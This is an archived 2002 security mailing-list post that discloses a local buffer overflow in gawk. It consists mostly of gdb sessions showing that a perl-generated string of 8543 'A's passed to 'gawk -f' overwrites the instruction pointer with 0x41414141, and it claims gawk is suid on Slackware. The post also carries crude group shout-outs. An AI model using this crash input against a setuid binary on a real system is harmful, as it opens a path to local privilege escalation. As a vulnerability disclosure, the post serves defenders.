lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - Gawk Overflow

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

We have extensively researched this problem in Gawk, and now have
deemed it to be a security hole.  Details follow.

# cat ESgawk.txt
 <-----]research!!![----->
Electronic Souls > Security Bug @!%^#%!^&#%@!(*#$@)($)*@(&$@(*$&@@$^&$#@

vux[ES] & gnome_ present:  /bin/gawk, /usr/bin/gawk local buffer overflow !!
I have information(from gnome_) that gawk program is suid on slackware linux.

- --> RedHat Linux 6.2 testing:
[pom@...t pom]$ gdb /bin/gawk core
GNU gdb 4.17.0.11 with Linux support
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
Core was generated by `gawk -f AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 6, Aborted.
Reading symbols from /lib/libm.so.6...done.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x40054d21 in __kill ()
(gdb) i r
     eax:        0x0           0
     ecx:        0x6           6
     edx: 0x401261cc  1074946508
     ebx:      0xa23        2595
     esp: 0xbfffae9c -1073762660
     ebp: 0xbfffaeac -1073762644
     esi: 0xbfffb0f3 -1073762061
     edi: 0xbfffaec4 -1073762620
     eip: 0x40054d21  1074089249
  eflags:      0x207 IOPL: 0; flags: CF PF IF
orig_eax:       0x25          37
      cs:       0x23          35
      ss:       0x2b          43
      ds:       0x2b          43
      es:       0x2b          43
      fs:       0x2b          43
      gs:       0x2b          43
(gdb)

(gdb) r -f `perl -e'print "A"x8543'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /bin/gawk -f `perl -e'print "A"x8543'`


Program received signal SIGSEGV, Segmentation fault.
strcpy (dest=0xbfffb123 'A' <repeats 200 times>...,
    src=0x41414141 <Address 0x41414141 out of bounds>)
    at ../sysdeps/generic/strcpy.c:37
./sysdeps/generic/strcpy.c:37: No such file or directory.
(gdb)i r
     eax: 0x7ebe6fe2  2126409698
     ecx: 0x7ebe6fe1  2126409697
     edx: 0x41414141  1094795585
     ebx: 0xbfffb123 -1073762013
     esp: 0xbfffb0f4 -1073762060
     ebp: 0xbfffb0f8 -1073762056
     esi: 0xbfffb123 -1073762013
     edi: 0xbfffb114 -1073762028
     eip: 0x400947a1  1074349985
  eflags:    0x10a06 IOPL: 0; flags: PF IF OF RF
orig_eax: 0xffffffff          -1
      cs:       0x23          35
      ss:       0x2b          43
      ds:       0x2b          43
      es:       0x2b          43
      fs:        0x0           0
      gs:        0x0           0

- --> PhatLinux testing:
(gdb)
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-mandrake-linux"...
(no debugging symbols found)...
(gdb) r -f `perl -e'print "A"x8543'`
Starting program: /bin/gawk -f `perl -e'print "A"x8543'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax            0xffffffff       -1
ecx            0x24     36
edx            0x24     36
ebx            0xfffffffa       -6
esp            0xbfffd174       0xbfffd174
ebp            0x0      0x0
esi            0x0      0
edi            0x0      0
eip            0x41414141       0x41414141
eflags         0x10282  66178
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
(gdb)

h4h4 - (c) 2002 vux //fEAr!

greetz to: gnome_, Brain Storm[ES] & ES-team.
fuckz to : Nia*[ES], CraigTM[ES].

#

Be sure to patch immediately.

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"People get drunk drinking alcohol."

-----BEGIN PGP SIGNATURE-----
Version: Hush 2.2 (Java)
Note: This signature can be verified at https://www.hushtools.com/verify

wlMEARECABMFAj3nDjoMHGVzQGh1c2guY29tAAoJEN5nGqhGcjltjwwAoI24zPTruD5h
T9FPXknQE8zEBkuTAJ4w47RIT3fk0+Gb11sGT726yWW70w==
=SplS
-----END PGP SIGNATURE-----




Concerned about your privacy? Follow this link to get
FREE encrypted email: https://www.hushmail.com/?l=2 

Big $$$ to be made with the HushMail Affiliate Program: 
https://www.hushmail.com/about.php?subloc=affiliate&l=427

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ